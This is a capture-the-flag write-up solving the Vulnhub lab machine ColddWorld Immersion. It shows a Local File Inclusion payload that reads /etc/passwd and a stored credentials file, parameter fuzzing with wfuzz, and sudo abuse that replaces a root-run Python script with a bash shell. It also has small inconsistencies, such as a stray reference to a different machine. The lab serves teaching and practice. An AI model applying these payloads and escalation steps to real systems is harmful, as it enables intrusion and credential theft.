ColddWorld Immersion Walkthrough – Vulnhub – Writeup

Welcome to ColddWorld Immersion Walkthrough – Vulnhub – Writeup. The machine is an easy machine to complete the boot to root challenge.

Link to the machine: https://www.vulnhub.com/entry/colddworld-immersion,668/

Walkthrough of phineas from Vulnhub

Identify the target

Firstly, I had to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Now that I have identified the IP address of the target, I can scan for open ports to identify exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.12 -oN immersion.nmap

From the screenshot above, we can see that there are HTTP and SSH services available. However, the port for SSH is 3042 instead of the usual 22. So, I decided to enumerate the webserver.

Enumerate web server

gobuster dir -u http://10.0.2.12 -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

I looked into all paths and on the page /login, we have an interesting finding.

When I clicked the login, it redirected me to another page /accounts.php. Furthermore, I looked at the source of the login page and found out that the page might have a Local File Inclusions (LFI) vulnerability.

The HTML comments say that there is a credentials file ‘carls.txt’ inside the directory /var. Likewise, the comment has a quoted page that might suggest the parameter that has LFI. Therefore, I tried the exploit as follows.

/login/accounts.php?page=../../../../etc/passwd

Since the HTML only renders a new line with the tag <br>, it is good to view the source of the page for proper output.

However, suppose if I hadn’t taken the hint for the get parameter, I should do fuzzing. To do fuzzing, we have a lot of tools, however, I prefer wfuzz. In wfuzz, it requires a FUZZ word that is tested with different words. Firstly, we have to run it without flags that would hide some results. Then, we have to add an extra option to hide unwanted results.

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd

As you can see above, the page has 0 characters with the tried options. This means that those are not the parameters that we are looking for. Hence, we can change hide these results.

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd --hh 0

Like we saw above, when tested with parameter “page”, we got different results. That’s how we have to identify the parameters when there aren’t any hints. However, in our case, there was a clear hint in the HTML comments.

Now that we know the way to get file inclusions, we can use the same technique to get the carls.txt file.

/login/accounts.php?page=../../../../var/carls.txt

I got the username and password but they didn’t work on the SSH service and the login page. However, when I decoded the password using base64, I got the real password.

echo Y2FybG9z | base64 -d

Then, I logged in to the SSH server.

ssh carls@10.0.2.12 -p 3042

Getting user privileges

Since I am inside the machine, my goal is to get the flags. I didn’t find the flag inside the directory of the user ‘carls’. So, I checked the sudo permissions of the user.

sudo -l

We can see that the user carls can run bash on the user c0ldd that is what we exactly needed.

sudo -u c0ldd /bin/bash
cd /home/c0ldd
cat user.txt
cat user.txt | base64 -d && echo

Finally, we got our first flag.

Getting root’s privileges

Next, we have to get the root access. Therefore, I looked at the sudo permissions of the user c0ldd.

sudo -l

The user can execute a python script named “DoNotRun.py” as root. Thus, we have to change the content of the script to something that would get us a root shell. Therefore, I looked at the content of the python file and the permissions on it.

cat DoNotRun.py
ls -al

The script simply printed a text infinitely. Likewise, the file is owned by root and other users won’t have access to write on it. However, since we have access to this directory, we can delete this file and create a file of the same name with the required content.

rm DoNotRun.py
echo 'import os;os.system("/bin/bash")' > DoNotRun.py
cat DoNotRun.py

Finally, I ran the command as sudo and got the root shell and the flag.

sudo python3 /home/c0ldd/DoNotRun.py
id
cd /root
ls -al
cat root.txt
cat root.txt | base64 -d && echo

Conclusion

This is an easy machine for a beginner to start learning about LFI and sudo abusing.

Leave a comment